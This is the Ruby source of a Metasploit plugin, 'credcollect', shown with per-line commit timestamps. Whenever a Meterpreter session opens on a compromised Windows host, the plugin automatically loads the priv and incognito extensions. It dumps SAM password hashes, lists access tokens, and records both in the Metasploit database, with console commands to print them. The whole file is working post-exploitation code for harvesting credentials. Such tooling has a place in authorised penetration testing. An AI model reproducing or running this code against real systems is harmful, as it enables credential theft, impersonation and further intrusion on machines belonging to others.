2009-03-28 07:44:44 +00:00
|
|
|
# credcollect - tebo[at]attackresearch.com
|
|
|
|
module Msf
|
|
|
|
|
|
|
|
class Plugin::CredCollect < Msf::Plugin
|
|
|
|
include Msf::SessionEvent
|
|
|
|
|
|
|
|
class CredCollectCommandDispatcher
|
|
|
|
include Msf::Ui::Console::CommandDispatcher
|
|
|
|
|
|
|
|
def name
|
|
|
|
"credcollect"
|
|
|
|
end
|
|
|
|
|
|
|
|
def commands
|
|
|
|
{
|
|
|
|
"db_hashes" => "Dumps hashes collected in the database",
|
|
|
|
"db_tokens" => "Dumps tokens collected in the database with host information"
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_hashes()
|
2009-11-05 18:17:38 +00:00
|
|
|
if not self.framework.db.active
|
|
|
|
print_error("Database not connected")
|
|
|
|
return
|
|
|
|
end
|
2009-03-28 07:44:44 +00:00
|
|
|
framework.db.each_note do |note|
|
|
|
|
if note.ntype == "auth_HASH"
|
|
|
|
print_line(note.data)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_tokens()
|
2009-11-05 18:17:38 +00:00
|
|
|
if not self.framework.db.active
|
|
|
|
print_error("Database not connected")
|
|
|
|
return
|
|
|
|
end
|
2009-03-28 07:44:44 +00:00
|
|
|
framework.db.each_note do |note|
|
|
|
|
if note.ntype == "auth_TOKEN"
|
|
|
|
print_line("#{note.host.address} - #{note.data}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_session_open(session)
|
2009-03-30 02:55:13 +00:00
|
|
|
|
|
|
|
return if not self.framework.db.active
|
|
|
|
|
2009-03-28 07:44:44 +00:00
|
|
|
print_status("This is CredCollect, I have the conn!")
|
|
|
|
|
|
|
|
if (session.type == "meterpreter")
|
|
|
|
|
|
|
|
# Make sure we're rockin Priv and Incognito
|
|
|
|
session.core.use("priv")
|
|
|
|
session.core.use("incognito")
|
|
|
|
|
|
|
|
# It wasn't me mom! Stinko did it!
|
|
|
|
hashes = session.priv.sam_hashes
|
|
|
|
|
|
|
|
# Target infos for the db record
|
|
|
|
addr = session.sock.peerhost
|
|
|
|
host = self.framework.db.report_host_state(self, addr, Msf::HostState::Alive)
|
|
|
|
|
|
|
|
# Record hashes to the running db instance as auth_HASH type
|
|
|
|
hashes.each do |user|
|
|
|
|
|
|
|
|
type = "auth_HASH"
|
|
|
|
data = user.to_s
|
|
|
|
|
|
|
|
# We'll make this look like an auth note anyway
|
|
|
|
self.framework.db.get_note(self, host, type, data)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Record user tokens
|
|
|
|
tokens = session.incognito.incognito_list_tokens(0).values
|
|
|
|
# Meh, tokens come to us as a formatted string
|
|
|
|
tokens = tokens.to_s.strip!.split("\n")
|
|
|
|
|
|
|
|
tokens.each do |token|
|
|
|
|
type = "auth_TOKEN"
|
|
|
|
data = token
|
|
|
|
|
|
|
|
self.framework.db.get_note(self, host, type, data)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_session_close(session)
|
|
|
|
end
|
|
|
|
|
|
|
|
def initialize(framework, opts)
|
|
|
|
super
|
|
|
|
self.framework.events.add_session_subscriber(self)
|
|
|
|
add_console_dispatcher(CredCollectCommandDispatcher)
|
|
|
|
end
|
|
|
|
|
|
|
|
def cleanup
|
|
|
|
self.framework.events.remove_session_subscriber(self)
|
|
|
|
remove_console_dispatcher('credcollect')
|
|
|
|
end
|
|
|
|
|
|
|
|
def name
|
2009-11-05 18:20:44 +00:00
|
|
|
"db_credcollect"
|
2009-03-28 07:44:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def desc
|
|
|
|
"Automatically grabs hashes and tokens from meterpreter session events and stores them in the db"
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|